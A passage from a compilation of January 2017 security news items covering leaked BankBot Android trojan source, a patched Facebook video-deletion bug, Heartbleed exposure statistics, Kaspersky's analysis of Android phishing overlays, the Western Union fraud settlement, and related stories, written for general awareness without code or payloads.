Mavens revenue for last year slightly topped $2 billion as compared to $1.7 billion in 2015.

"I'm very pleased with our Q4 results and incredibly proud of the team's execution on our 2016 strategic plan, particularly given the uniquely eventful past year for Yahoo," Mayer said.

Source Code for BankBot Android Trojan Leaks Online

24.1.2017 Securityweek Android
The source code of Android banking Trojan BankBot, along with instructions on how to use it, recently emerged on a hacker forum, Doctor Web security researchers have discovered.

The source code was published about a month ago, but Android malware based on the code was spotted last week. Once the malware gets admin privileges on an infected device, it removes its shortcut from the homescreen to hide itself and hinder removal. Next, it connects to a command and control (C&C) server to retrieve instructions.

The BankBot Trojan is distributed masquerading as benign applications. On the infected devices, it can request administrative privileges to display phishing pages to steal login credentials, intercept and send SMS messages, send USSD requests, retrieve contacts list, track the device, make calls, and receive an executable file containing a list of banking apps to attack.

Malicious programs that provide such capabilities are usually being sold as commercial products on underground forums. However, with the source code of this application leaked online, chances are that the number of attacks involving Android banking Trojans will register a significant increase soon, Dr.Web suggests.

The malware can track the launch of banking applications on the user’s device and overlay phishing dialogues to trick users into revealing their login information. The malware is targeting over three dozen such financial applications, including banking and payment system software.

The security researchers have discovered that the malware can also steal bank card information. For that, the Trojan tracks the launch of multiple popular applications on the device, including Facebook, Viber, Youtube, WhatsApp, Uber, Snapchat, WeChat, imo, Instagram, Twitter, and Play Store, to display a phishing dialog on top of them, tricking users into believing it is a Google Play purchase page.

“Information on found matches is sent to the C&C server. The Trojan receives a list of files to be monitored from execution. After one of them is launched, Android.BankBot.149.origin displays WebView on top of the attacked application with a fraudulent authentication form to access the user account. Then the entered information is sent to the server,” Dr.Web says.

BankBot was also designed to steal SMS messages. When an SMS arrives, the malware turns off sounds and vibrations and sends the content of the message to the cybercriminals, while also attempting to delete the original entry from the list of incoming SMS. This would result in users missing bank notifications about unplanned transactions that cybercriminals are performing.

Data stolen from the device, which includes information on the anti-virus applications installed on the infected device, is uploaded to the C&C server, making it accessible to the cybercriminals. What’s more, the security researchers say, an administration panel provides operators with control over the malicious app.

“In general, the possibilities of this Trojan are quite standard for modern Android bankers. However, as cybercriminals created it with publicly available information, one can anticipate that many Trojans similar to it will appear,” Doctor Web’s security researchers conclude.

“Dumping malware code is great way to allow others to contribute to the code and modify it to help evade detection. This tactic was very successful for distributing Zeus. When you have a larger group modifying the code, the number of variants increases rapidly, making it very hard for security products that rely on pattern matching to detect it,” Lamar Bailey, Senior Director of Security R&D for Tripwire, told SecurityWeek in an emailed comment.

This Bug Could Allow Hackers to Delete Any Video On Facebook
23.1.2017 thehackernews
A security researcher has discovered a critical vulnerability in Facebook that could allow attackers to delete any video of the social networking site shared by anyone on their wall.
The flaw has been discovered by security researcher Dan Melamed in June 2016, allowing him not only to remotely delete any video on Facebook shared by anyone without having any permission or authentication but also to disable commenting on the video of your choice.
Here's how to exploit this flaw:
In order to exploit this vulnerability, Melamed first created a public event on the Facebook page and uploaded a video on the Discussion part of the event.
While uploading the video, the researcher tampered the POST request using Fiddler and then replace the Video ID value of his video with Video ID value of any other video on the social media platform.
Although Facebook responded to this issue with a server error, i.e. "This content is no longer available," but the new video was successfully got posted and displayed just fine.
Once this task was accomplished, Melamed deleted his event post, which eventually deleted the attached video.
And guess what? This in turned removed the video from the social networking site and the wall of the victim.
"You will also notice in the drop down section that there is the option to "Turn off commenting." This allows you to disable commenting on the video of your choice," Melamed writes.
Video Demonstration


For more step by step details about the vulnerability and how it works, you can watch the proof-of-concept video demonstration above which shows the Facebook video deletion attack in action.
Melamed responsibly reported the vulnerability to the Facebook security team, which patched the vulnerability within two weeks at the beginning of this year.
Shortly after patching the flaw, the social media giant rewarded him $10,000 bug bounty for his efforts.
This is not the very first time when such vulnerability has been disclosed in Facebook that could have allowed attackers to delete any video from Facebook. Bug bounty hunters continuously find and report such bugs to keep the social media platform safe and secure.

Heartbleed Still Affects 200,000 Devices: Shodan

23.1.2017 Securityweek Vulnerebility
While the number of services affected by the OpenSSL flaw known as Heartbleed has decreased, the Shodan search engine has still found nearly 200,000 vulnerable devices.

Heartbleed, tracked as CVE-2014-0160, is a critical vulnerability that allows attackers to steal information protected by SSL/TLS encryption. Some researchers believe the flaw was used in an attack where hackers managed to steal 4.5 million healthcare records.

A search for vulnerable devices conducted by Shodan in November 2015 returned 238,000 results and the number dropped by roughly 1,000 by late March 2016. A new search carried out on Sunday showed that 199,594 services are still vulnerable to Heartbleed attacks.

Many of the affected devices are located in the United States (42,000), followed by South Korea (15,000), China (14,000), Germany (14,000), France, (8,700), Russia (6,600), UK (6,500), India (5,800), Brazil (5,500) and Italy (4,800). HTTPS accounts for a large majority of impacted services.

Geographical distribution of devices affected by Heartbleed

South Korea occupied only the 8th place after previous scans, but it has now become the second most affected country, apparently due to devices operated by SK Broadband, Boranet and KT Corporation (formerly Korea Telecom).

The list of top affected organizations also includes Amazon, Verizon Wireless, German ISP Strato, OVH in France, German hosting firm 1&1 Internet, Comcast, and Taiwan-based HiNet.

Apache HTTP Server (httpd) is by far the most affected product, particularly versions 2.2.22 and 2.2.15, while the top operating system is Linux 3.x. Shodan also found that more than 70,000 of the affected services have expired SSL certificates.

Yahoo Faces SEC Probe into Breach Disclosures

23.1.2017 Securityweek IT
In November 2016 Yahoo announced that it was cooperating with federal, state and foreign agencies, including the US Securities and Exchange Commission (SEC), who were seeking information on the data breaches also announced during 2016. In December, the SEC issued requests for relevant documents from Yahoo, and Yahoo is now reported to be under investigation.

In September 2016 Yahoo announced that it had suffered a breach in 2014. It claimed that 'state-sponsored' attackers had stolen data from 500 million users. Two months later it disclosed that an earlier breach from August 2013 had led to the compromise of 1 billion user accounts. Yahoo has not said when it knew about these breaches.

Different agencies have different rules about the disclosure of data breaches. The SEC's own 2011 rules are considered to be vague, and have never been enforced. It investigated the Target breach, but concluded that its own rules were not broken. These require that incidents that could have a "material adverse effect on the business" should be disclosed, but they do not define what this would be. The sheer size of the two Yahoo breaches combined with the intended acquisition of the organization by Verizon could make this a new test case for the SEC rules.

Yahoo may consider that simply disclosing the breaches before the Verizon acquisition is completed (expected to be during Q1 2017) may be sufficient to comply with the SEC rules. The SEC's primary concern is to protect investors rather than users. Although it was thought that the breaches might cause Verizon to pull out of the acquisition, this is now thought to be unlikely. Yahoo can therefore argue that non-disclosure has not affected investors.

Verizon originally agreed to pay $4.8 billion for Yahoo, although the New York Post reported that it subsequently sought a $1 billion discount following the first disclosure. The report added, "At the same time, the Yahoo deal team is pushing back hard against any attempts to negotiate the price down, sources said."

The SEC is best known for its actions against fraud rather than data protection. In October 2016, it ordered one of the Big 4 global audit companies, Ernst & Young, to pay $11.8 million ($1 million fines and $10.8 million in audit fee give-backs plus interest) for missing a major accounting fraud at Weatherford International.

Other agencies are more concerned about the compromise of personal data. In Europe, current data protection laws are enforced by individual national authorities (such as the Information Commissioner in the UK). The Article 29 Working Group comprises representation from all of the national regulators. In October 2016 it wrote to Yahoo asking for breach details: "As Data Protection Authorities (DPAs) in charge of the protection of European individuals' data, we are deeply concerned by the report and the significant number of EU data subjects which may be affected."

Any subsequent action from European regulators would come from each individual country concerned. For example, the ICO fined TalkTalk $510,000 in October 2016. Such fines could, however, be dwarfed by those available under the upcoming General Data Protection Regulation. Here, the ICO warns, "A notifiable breach has to be reported to the relevant supervisory authority within 72 hours of the organization becoming aware of it... Failing to notify a breach when required to do so can result in a significant fine up to 10 million Euros or 2 per cent of your global turnover."

It seems almost certain that Yahoo did not make its breach notifications within 72 hours of discovery. The implication is that if the GDPR were already operational, Yahoo would have even more problems than it already has.

Over 199,500 Websites Are Still Vulnerable to Heartbleed OpenSSL Bug
23.1.2017 thehackernews

It's more than two and half years since the discovery of the critical OpenSSL Heartbleed vulnerability, but the flaw is still alive as it appears that many organizations did not remediate properly to the serious security glitch.
It was one of the biggest flaws in the Internet's history that affected the core security of as many as two-thirds of the world's servers i.e. half a million servers at the time of its discovery in April 2014.
However, the critical bug still affects more than 199,500 systems even after 2 years and 9 months have already passed, according to a new report published today on Shodan, a search engine that scans for vulnerable devices.
Over 199,500 Systems Still Vulnerable to Heartbleed
Heartbleed (CVE-2014-0160) was a serious bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allowed attackers to read portions of the affected server’s memory, potentially revealing users data that the server isn't intended to reveal.
According to Shodan CEO John Matherly, about 199,500 services remain exploitable by the Heartbleed vulnerability due to unpatched OpenSSL instances.
The countries most affected by Heartbleed still remain the United States, followed by Korea, China, Germany, France, Russian Federation, United Kingdom, India Brazil and Italy.
Matherly discovered 42,032 heartbleed-exploitable services in the United States, 15,380 in Korea, 14,116 in China, and 14,072 services in Germany.
With top organizations vulnerable to the OpenSSL bug is SK Broadband and Amazon.com, and about 75,000 of the vulnerable services use expired SSL certificates and run Linux 3.x.
Heartbleed is one of many flaws that often exist unpatched in the wild, and now that the bug has been more than two and half years old and known to everybody, anyone can simply use it to carry out attacks against the still affected systems.
Around 200,000 is really a troubling number, and one can imagine the danger and damages caused by the bug if exploited.
Software bugs may come and go, but this flaw is more critical and probably the biggest Internet flaw in recent history as it left the contents of a server's memory, where the most sensitive data is stored, exposed to the attackers.
What are the Steps to Protect your Systems against Heartbleed?
It takes roughly three steps to remediate the Heartbleed bug.
Patching: Update your software to the latest versions of OpenSSL; thankfully almost all organization have accomplished this step.
Creation of New Private Keys: Creating new private keys will prevent an attacker, who already exploited the flaw before patching, from being able to spy on your encrypted.
Reissuance of Security Certificates: This step will eliminate the ability of any attacker to spoof organizations and fool or phish their customers.

Expert Hacks Internal DoD Network via Army Website

23.1.2017 Securityweek Hacking

A security researcher who took part in the Hack the Army bug bounty program managed to gain access to an internal Department of Defense (DoD) network from a public-facing Army recruitment website.

Hack the Army ran via the HackerOne platform between November 30 and December 21, and the results of the program have now been made public. A total of 371 people registered, including 25 government employees, and they submitted 416 vulnerability reports – the first one came within five minutes of launch.

Roughly 118 of the reports have been classified as unique and actionable, and participants have been awarded a total of approximately $100,000. The final amount may be larger as bounties are still being paid out.

The most noteworthy submission came from a researcher who managed to chain multiple vulnerabilities in order to get from the goarmy.com Army careers website to an internal DoD network that can normally be accessed only by authorized users.

“They got there through an open proxy, meaning the routing wasn’t shut down the way it should have been, and the researcher, without even knowing it, was able to get to this internal network, because there was a vulnerability with the proxy, and with the actual system,” the Army said in a blog post on HackerOne.

The Army believes an automated testing system could not have known how to chain less serious flaws into a potentially dangerous exploit.

Hack the Army was announced in mid-November after the DoD awarded a combined $7 million contract to HackerOne and Synack for helping the organization’s components launch bug bounty programs similar to Hack the Pentagon.

Hack the Pentagon received 138 valid submissions and it cost the U.S. government $150,000, half of which went to participants. Thanks to the success of these programs, similar events will likely be launched in the future.

In the meantime, researchers who find flaws in the DoD’s *.defense.gov and *.mil websites are still encouraged to report them. The Pentagon recently published its vulnerability disclosure policy in an effort to provide guidance to white hat hackers on how to legally report their findings.

Symantec Revokes Wrongly Issued Certificates

23.1.2017 Securityweek Safety

Symantec has revoked numerous wrongly issued certificates, including for domains such as example.com and test.com. This is not the first time the security firm’s certificate issuance practices have come under scrutiny.

The misissued certificates were spotted via the Certificate Transparency (CT) system by Andrew Ayer, founder of SSLMate. The expert discovered several certificates for example.com, which he confirmed were not authorized by the domain’s owner. He also identified certificates for domains such as test.com, test1.com, test2.com, and others containing the string “test.”

Ayer found more than 100 wrongly issued certificates attributed to Symantec and its subsidiaries GeoTrust and Thawte. The problematic certificates have several entries with the value “test,” which suggests they have been issued for testing purposes.

19 Jan
Andrew Ayer @__agwa
This is a HUGE no-no. There are very specific rules certificate authorities must follow to verify that a certificate request is authorized.
Andrew Ayer @__agwa
Even if the certs were only for testing, if a system allows employees to bypass authorization, it will allow attackers to bypass it too.
10:50 PM - 19 Jan 2017
Retweets likes

Steven Medin, PKI policy manager at Symantec, said the certificates had been issued by one of the company’s WebTrust audited partners. Medin said this partner’s privileges have been reduced to restrict further issuance and the reported certificates have all been revoked.

Ayer has advised domain owners to monitor CT logs to determine if unauthorized certificates have been issued for their websites. Since this is not the first time Symantec has misissued certificates, the expert has also recommended excluding the company via CAA records, which allow users to specify which CA can issue certificates for their domain.

In October 2015, Google asked Symantec to improve its certificate issuance practices after Thawte was caught releasing certificates for google.com domains. The company claimed to have issued the certificates for testing purposes, but it ultimately decided to terminate some employees after completing its investigation.

Symantec’s certificate business also made the news in February 2016, when the company asked browser vendors to allow it to issue nine new SSL certificates signed with SHA-1 for Worldpay after the payment processor failed to upgrade some devices before the December 31, 2015, deadline.

Mozilla Internet Health Report calls for more security and privacy

23.1.2017 securityaffairs Security

The Mozilla foundation has published its first Internet Health Report to analyze the dangers of the Internet that we can consider as a global commodity.
The Mozilla foundation has published its first Internet Health Report to analyze the dangers of the Internet that we can consider as a global commodity.

The oligarchy of internet companies. internet monitoring, censorship and new threats posed by Internet of Things devices every day menace our privacy.

Mozilla aims to track the health of the Internet focusing on aspects such as the Open Innovation, Digital Inclusion, Decentralization, Privacy and Security and Web literacy.

“We want to work with people and organizations that care about a healthy internet to engage the general public in caring more deeply about ‘internet health,’ in the way that the environmental movement was able to grow mainstream using terms like ‘global warming’ that no one previously had heard of,” explained the editor Solana Larsen.

Positive news from the security and privacy perspective, communications over the Internet is more secure thanks to the efforts of organizations and private companies.

The Internet Health Report appreciates the adoption of end-to-end encryption by messaging apps and other web services and welcomes the upcoming new version of the Transport Layer Security (TLS 1.3) cryptographic protocol that will make the web more secure and fast.

“More messaging apps, including WhatsApp, now offer end-to-end encryption, meaning that conversations are protected from eavesdroppers, including the service provider.” states the report.

“Web traffic encryption is rising too. One factor is the launch of Let’s Encrypt, a new certificate authority that makes it easy and free to add HTTPS to any website. This helps protect the privacy of users, and offers some guarantee they are not looking at spoof pages. Also driving adoption, search engines and browsers are now subtly rewarding HTTPS websites.

Unknown to most, Internet communication will be more private, and possibly also faster, due to an upcoming new version of the cryptographic protocol called Transport Layer Security (TLS 1.3) that is used to secure all communications between Web browsers and servers.”

Unfortunately, snooping powers continues to grow, several states continues to spend a significant effort in surveillance activities threatening users’ privacy.

“There is more public scrutiny of surveillance laws than before, but it hasn’t stopped greater snooping powers from being proposed in Britain, Pakistan, France and several other countries,” states the report.

The report also warns of the risks related to a rapid and uncontrolled diffusion of unsecured IoT device. The lax of security is the root cause for the success of botnet like Mirai and open the door to surveillance and hacking activities.

“In November 2016, a malware program called Mirai mobilized 100,000 connected devices, including webcams and baby monitors, in a distributed denial-of-service attack (DDOS) that briefly took down parts of the internet,” states the report.

“The owners of those compromised devices may never know (or care) what happened, and cheap and insecure devices will continue to be manufactured, unless safety standards, rules and accountability measures take hold,” they said.

Mozilla Foundation is calling to action everyone to improve and ensure security and privacy.

“Above all, we should be more critical about what information we share voluntarily. Will the online dating profile you posted 6 years ago ever get deleted? How long do the online ads you view track you? Even if you’d like to know the privacy conditions of online platforms, they are usually not written in English,” closes the report.

Do web injections exist for Android?
23.1.2017 Kaspersky Android
Web injection attacks

There’s an entire class of attacks that targets browsers – so-called Man-in-the-Browser (MITB) attacks. These attacks can be implemented using various means, including malicious DLLs, rogue extensions, or more complicated malicious code injected into pages in the browser by spoofing proxy servers or other ways. The purpose of an MITB attack may vary from relatively innocuous ad spoofing on social networks or popular websites to stealing money from user accounts – the latter is what happened in the Lurk case.

Do web injections exist for Android?

A malicious app masquerades as a Kaspersky Lab product in an MITB attack

Web injection is used in most cases when an MITB-class attack targets online banking. This type of web injection attack involves malicious code being injected into an online banking service webpage to intercept the one-time SMS message, harvest information about the user, spoof banking details, etc. For example, our Brazilian colleagues have long reported about barcode spoofing attacks performed when users print out Boletos – popular banking documents issued by banks and all kind of businesses in Brazil.

Meanwhile, the prevalence of MITB attacks in Russia is decreasing – cybercriminals are opting for other methods and attack vectors to target banking clients. For the average cybercriminal, it is much easier to use readily available tools than develop and implement web injection tools.

Despite this, we’re often asked if there are any web injection attacks for Android devices. This is our attempt to investigate and give as full an answer as possible.

Web injection on Android

Despite the term ‘inject’ being used in connection with mobile banking Trojans (and sometimes used by cybercriminals to refer to their data-stealing technologies), Android malware is a whole different world. In order to achieve the same goals pursued by web injection tools on computers, the creators of mobile Trojans use two completely different technologies: overlaying other apps with a phishing window, and redirecting the user from a banking web page to a specially crafted phishing page.

Overlaying apps with phishing windows

This is the most popular technology with cybercriminals and is used in practically all banking Trojans. 2013 was when we first encountered a piece of malware overlaying other apps with its phishing window – that was Trojan-Banker.AndroidOS.Svpeng.

Today’s mobile banking Trojans most often overlay the Google Play Store app with their phishing window – this is done in order to steal the user’s bank card details.

Do web injections exist for Android?

The Marcher malware

Besides this, Trojans often overlay various social media and instant messaging apps and steal the passwords to them.

Do web injections exist for Android?

Do web injections exist for Android?

However, mobile banking Trojans typically target financial applications, mostly banking apps.

Three methods of MITB attacks for mobile OS can be singled out:

1. A special Trojan window, crafted beforehand by cybercriminals, is used to overlay another app’s window. This method was used, for example, by the Acecard family of mobile banking Trojans.

Do web injections exist for Android?

Acecard phishing windows

2. Apps are overlaid with a phishing web page located on a malicious server. This way, the cybercriminals can modify its contents any time they need to. This method is used by the Marcher family of banking Trojans.

Do web injections exist for Android?

Marcher phishing page

3. A template page is downloaded from a malicious server, to which the icon and the name of the attacked application is added. This is how one of the Trojan-Banker.AndroidOS.Faketoken modifications manages to attack over 2,000 financial apps.

Do web injections exist for Android?

FakeToken phishing page

It should be noted that starting from Android 6, for the above attack method to work, the FakeToken Trojan has to request the privilege of displaying its window on top of other app windows. It’s not alone though: as new versions of Android are gaining popularity, a growing number of mobile banking Trojans are beginning to request such privileges.

Redirecting the user from the bank’s page to a phishing page

We were only able to identify the use of this technology in the Trojan-Banker.AndroidOS.Marcher family. The earliest versions of the Trojan that redirected the user to a phishing page are dated late April 2016, and the latest are from the first half of November 2016.

Redirecting the user from a bank’s webpage to a phishing page works as follows. The Trojan subscribes to modify browser bookmarks, which includes changes in the current open page. This way the Trojan knows which webpage is currently open, and if it happens to be one of the targeted pages, the Trojan opens the corresponding phishing page in the same browser and redirects the user there. We were able to find over a hundred web pages belonging to financial organizations that were targeted by the Marcher family of Trojans.

However, two points need to be raised:

All new modifications of the Marcher Trojan that we were able to detect no longer use this technology.
Those modifications that used this technology also used a method of overlaying other apps with their phishing window.
Why then was the method of redirecting the user to a phishing page used by only one family of mobile banking Trojans, and why is this technology no longer used in newer modifications of the family? There are several reasons:

In Android 6 and later versions, this technology no longer works, meaning the number of potential victims is decreasing every day. For example, around 30% of those using Kaspersky Lab’s mobile security solutions now use Android 6 or a later version;
The technology only worked on a limited number of mobile browsers;
The user can easily spot that they are being redirected to a phishing site and they may also notice that the URL of the webpage has changed.
Attacks launched using root privileges

With superuser privileges, Trojans can perform any attack, including real malicious injections into browsers. Although we were unable to find a single case of this happening, the following should be noted:

Some modules of Backdoor.AndroidOS.Triada can substitute websites in certain browsers, using superuser privileges. All the attacks we found were launched with the purpose of making some money from advertising only, and did not result in the theft of banking information.
The banking Trojan Trojan-Banker.AndroidOS.Tordow, using superuser privileges, can steal passwords saved in browsers, which may include passwords to financial websites.

We can state that, despite all the available technical capabilities, cybercriminals that target banks do not make use of malicious web injections in mobile browsers or injections in mobile apps. Sometimes they use these technologies to spoof adverts, but even then that requires highly sophisticated malicious software.

So why do cybercriminals ignore the available opportunities? Most probably it is because of the diversity of mobile browsers and apps. Malware writers would have to adapt their creations to a long list of programs, which is rather costly, while simpler and more versatile attacks involving phishing windows do not require so much effort to target a larger number of users.

Nonetheless, the Triada and Tordow examples suggest that similar attacks may well take place in the future as malware creators gain more expertise.

Source Code for another Android Banking Malware Leaked
23.1.2017 thehackernews Android
Another bad news for Android users — Source code for another Android banking malware has been leaked online via an underground hacking forum.
This newly discovered banking Trojan is designed to steal money from bank accounts of Android devices' owners by gaining administrator privileges on their smartphones.
Apparently, it will attract the attention of many cyber criminals who can recompile the source code or can also use it to develop more customized and advanced variants of Android banking Trojans.
According to security researchers from Russian antivirus maker Dr. Web, the malware's source code was posted online, along with the information on how to use it, meaning Android devices are most likely to receive an increasing number of cyber attacks in upcoming days.
Leaked: Trojan Source Code + 'How to Use' Instructions
Dr. Web researchers said they have already discovered one banking trojan in the wild developed using this leaked source code, adding that the Trojan is distributed as popular apps either directly injected in APKs available online or in third-party app stores.
Dubbed BankBot, the trojan has the ability to get administrator privileges on infected devices. Once it gets full privileges, the malware trojan removes the app's icon from the phone's home screen in order to trick victims into believing it was removed.
However, the BankBot trojan remains active in the background, waiting for commands from attacker's command and control (C&C) server. It found targeting only users of Russian banks.
Also Read: GM Bot (Android Malware) Source Code Leaked Online
BankBot has the ability to perform a broad range of tasks, including send and intercept SMS messages, make calls, track devices, steal contacts, show phishing dialogs, and steal sensitive information, like banking and credit card details.
"Like many other Android bankers, [BankBot] steals confidential user information by tracking the launch of online banking apps and payment system software. One sample examined by Doctor Web's security researchers controls over three dozen such programs," the researchers explains.
"Once Android.BankBot.149.origin detects that any of the aforementioned applications have been launched, it loads the relevant phishing input form to access user bank account login and password information and displays it on top of the attacked application."
Why Should You Worry about BankBot?
The malware hides itself until the victim opens any mobile banking or social media app. Once the victim opens one such app, BankBot launches a phishing login overlays, tricking victims to re-authenticate or re-enter their payment card details.
The collected data is then sent back to online servers, where the attackers can access the stolen data.
BankBot can phish credentials for apps including Facebook, WhatsApp, Instagram, Twitter, Youtube, Snapchat, Viber, WeChat, imo, Uber, and the Google Play Store.
Besides this, the BankBot trojan can also intercept text messages, send them to the attackers, and then delete them from the victim's smartphone, which means bank notifications never reach the users.
How to Protect Yourself against such Attacks?
Now, this is just one piece of malware developed using the publicly available source code and discovered by researchers. There are chances that more such malware are out there targeting Android devices but not yet caught.
To prevent yourself against such attacks, as I previously recommended, you are advised to:
Always be super-careful when downloading APKs from third-party app stores. Go to Settings → Security and then Turn OFF "Allow installation of apps from sources other than the Play Store."
Never open attachments from unknown or suspicious sources.
Never click on links in SMS or MMS sent to your mobile phone. Even if the email looks legit, go directly to the website of origin and verify any possible updates.
Always keep your Anti-virus app up-to-date.
Keep your Wi-Fi turned OFF when not in use and Avoid unknown and unsecured Wi-Fi hotspots.

Number of U.S. Data Breaches Increased in 2016: Report

23.1.2017 Securityweek Crime
The number of data breaches disclosed by organizations in the United States has increased by 40 percent in 2016 compared to the previous year, according to a report released on Thursday by CyberScout (formerly IDT911) and the Identity Theft Resource Center (ITRC).

ITRC has counted 1,093 breaches and more than 36 million exposed records across sectors such as financial, business, education, government and military, and healthcare. While this is an all-time record high and a significant increase from the 780 breaches reported in 2015, experts believe this upwards trend is also due to more states disclosing incidents on their websites.

It’s also worth noting that while 36 million records might not seem much, ITRC has pointed out that half of the breach notifications did not disclose the number of exposed records.

Nearly half of the data breaches disclosed last year affected the business sector (494), followed by healthcare (377), education (98), government (72) and financial (52). Hacking, phishing and skimming attacks, including business email compromise (BEC) schemes, accounted for more than 55 percent of incidents.

Data breach trends

ITRC has determined that at least 52 percent of the breaches reported in 2016 involved social security numbers and 13 percent involved payment cards. While the number of incidents exposing credit and debit cards has decreased compared to 2015, exposure of SSNs increased by 8.2 percent.

“More than half of the breaches reported by the ITRC included the skeleton key to our lives: the Social Security number. This trend, which has accelerated since 2015— when just four breaches exposed over 120 million Social Security numbers to state-sponsored hackers and cyber criminals— represents the point of no return for millions of Americans,” said Adam Levin, Chairman and Founder of CyberScout. “While credit and debit card numbers can be changed, SSNs cannot. Therefore, monitoring and damage control become even more important than ever before.”

The complete list of breached organizations and information on each incident are available in ITRC’s 2016 Data Breach Report.

OurMine crew hacked the New York Times Twitter video account
23.1.2017 securityaffairs
The New York Times is investigating the hack of its Twitter video account (@nytvideo) that was used to post a fake news on Sunday morning.
@nytvideo is the newspaper is the New York Times video account and has more than 250,000 followers on the platform.
Yesterday around 9:40 a.m. ET the Twitter account shared a fake news about a missile attack from Russia against the United States. The message about the “missile attack” quoted a “leaked statement” from Russian President Vladimir Putin.

New York Times hacked

That fake news was quickly deleted, while other tweets were claiming the involvement of the dreaded OurMine hacker group. The group, who hacked the Netflix US Twitter account (@Netflix) in December to promote its website and hacking services, is known for its attacks against high-profile Twitter accounts. The list of victims is very long and includes Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta Daniel Ek, former Twitter CEO Dick Costolo, Twitter CEO Jack Dorsey, the CEO and founder of Spotify, Google CEO Sundar Pichai, and many others.

One of the messages shared by OurMine confirmed that the group is responsible for the hijacking of the Sony Music’s Twitter account occurred last month when the hackers tweet a hoax about Britney Spears’ death.

Below the messages shared by the group:

“Message from OurMine: We detected unusual activity on the account and we re-hacked it to make sure if the account is hacked or not,” read one tweet posted to the @nytvideo account Sunday.

New York Times hacked

All the messages were deleted by IT staff at The York Times, the account also posted a message to confirm that a series of tweets published from the account “without our authorization” were removed.

New York Times Video ✔ @nytvideo
We deleted a series of tweets published from this account earlier today without our authorization. We are investigating the situation.
4:17 PM - 22 Jan 2017
188 188 Retweets 146 146 likes
“We are investigating the situation,” that tweet read.

Western Union agreed to pay $586 Million to settle fraud charges
23.1.2017 securityaffairs Incindent

The money transfer leader company Western Union has agreed to forfeit $586 million to settle fraud charges and admitted it facilitated scammers.
Money transfer leader company Western Union has admitted to facilitating wire fraud and it has agreed to pay $586 million to settle fraud charges from the U.S. Federal Trade Commission (FTC) and the Department of Justice.

The services offered by the Western Union’s have often exploited by crooks and fraudsters because the company has failed to maintain a proper anti-fraud program.

The U.S. Federal Trade Commission (FTC) and the Department of Justice accused the company of not taking immediate action against cyber criminals that used its service to transfer money that is the result of illicit activities.

Since 2001, the US authorities have convicted 29 owners and employees of Western Union agents for their active participation in fraud schemes.

“As this case shows, wiring money can be the fastest way to send it – directly into the pockets of criminals and scam artists,” said Acting Assistant Attorney General David Bitkower. “Western Union is now paying the price for placing profits ahead of its own customers. Together with our colleagues, the Criminal Division will both hold to account those who facilitate fraud and abuse of vulnerable populations, and also work to recoup losses and compensate victims.”

“Our investigation uncovered hundreds of millions of dollars being sent to China in structured transactions designed to avoid the reporting requirements of the Bank Secrecy Act, and much of the money was sent to China by illegal immigrants to pay their human smugglers,” said U.S. Attorney Eileen M. Decker. “In a case being prosecuted by my office, a Western Union agent has pleaded guilty to federal charges of structuring transactions – illegal conduct the company knew about for at least five years. Western Union documents indicate that its employees fought to keep this agent – as well as several other high-volume independent agents in New York City – working for the Western Union because of the high volume of their activity. This action today will ensure that Western Union effectively controls its agents and prevents the use of its money transfer system for illegal purposes.”

Western Union has been charged with violating several laws, including the Bank Secrecy Act (BSA) and the FTC Act.

The FTC said Western Union had received, between January 1, 2004 and August 29, 2015, 550,928 complaints regarding fraudulent transfers.

Fraudulent money transfers are related to online dating, lottery, family emergency scams and other illegal activities. The total of the transfers totaled more than $632 million, but prosecutors believe it is just the tip of the iceberg. Many victims don’t file a complaint and fraud-reporting mechanisms are not available everywhere.

“Western Union maintains a database of complaints it receives about fraud-induced money transfers. Based on information in that database, between January 1, 2004 and August 29, 2015, Western Union received at least 550,928 complaints about fraud-induced money transfers, totaling at least $632,721,044. Over 80% of the complaints in the database were from U.S. consumers” reads the complaint.

Western Union

Western Union has agreed to forfeit $586 million, the money will be used to compensate the victims of the frauds.

“The Western Union Company (Western Union), a global money services business headquartered in Englewood, Colorado, has agreed to forfeit $586 million and enter into agreements with the Federal Trade Commission, the Justice Department, and the U.S. Attorneys’ Offices of the Middle District of Pennsylvania, the Central District of California, the Eastern District of Pennsylvania and the Southern District of Florida. In its agreement with the Justice Department, Western Union admits to criminal violations including willfully failing to maintain an effective anti-money laundering program and aiding and abetting wire fraud.” states the settlement.

The FTC has ordered Western Union to implement and maintain a comprehensive anti-fraud program, it prohibits the company from transmitting a money transfer that it knows or reasonably should know is fraud-induced, and requires it to:

block money transfers sent to any person who is the subject of a fraud report;
provide clear and conspicuous consumer fraud warnings on its paper and electronic money transfer forms;
increase the availability of websites and telephone numbers that enable consumers to file fraud complaints; and
refund a fraudulently induced money transfer if the company failed to comply with its anti-fraud procedures in connection with that transaction.
Western Union isn’t the unique money transfer company targeted by the FTC, MoneyGram agreed to pay $18 million in 2009 to settle charges.

Russian Hacker behind 'NeverQuest' Malware, Wanted by FBI, Is Arrested in Spain
22.1.2017 thehackernews Hacking
A Russian computer hacker wanted by the FBI on hacking allegations was arrested and jailed in Spain earlier this week, while a decision on his extradition to the United States has yet to be made.
The Guardia Civil, Spanish law enforcement agency officers, have detained 32-year-old Stanislav Lisov at Barcelona–El Prat Airport based on an international arrest warrant issued by Interpol at the request of the FBI.
Lisov is arrested on suspicion of creating and operating the NeverQuest Banking Trojan, a nasty malware that targeted financial institutions across the world and caused an estimated damage of $5 Million.
The arrest was made after U.S. intelligence agencies found that Russian hackers were behind the November 2016 election hacks that possibly influenced the presidential election in Donald Trump's favor.
However, Spanish police made an official statement, saying that the FBI had requested the arrest of Lisov after an investigation that started in 2014.
NeverQuest banking trojan provided fraudsters access to computers of people and financial institutions to steal banking data.
The Trojan, which spreads itself via social media, email and file transfer protocols, can modify content on banking websites and inject rogue forms into these sites, allowing attackers to steal login credentials from users.

NeverQuest can also allow malicious attackers to take control of a compromised computer through a Virtual Network Computing (VNC) server and then use those computers to log into the victim’s online bank and perform the theft.
"A thorough investigation of the servers operated by Lisov in France and Germany revealed databases with stolen lists of information from accounts of financial institutions, with data indicating, among other things, account balances," the Spanish Civil Guard said Friday.
"One of the servers leased by Lisov contained files with millions of login credentials, including usernames, passwords, and security questions and answers, for the bank and financial website accounts."
Lisov reportedly works as a systems administrator and website developer for a local company in Taganrog, Russia.
The Russian hacker is being held under observation by authorities in the north-eastern region of Catalonia before Spain's High Court decides whether to extradite him to the United States.

Cyber crimes spike in England and Wales, says ONS
22.1.2017 securityaffairs Hacking
For the first time the England the Office for National Statistics (ONS) includes data related hacking and fraud, and findings are shocking.
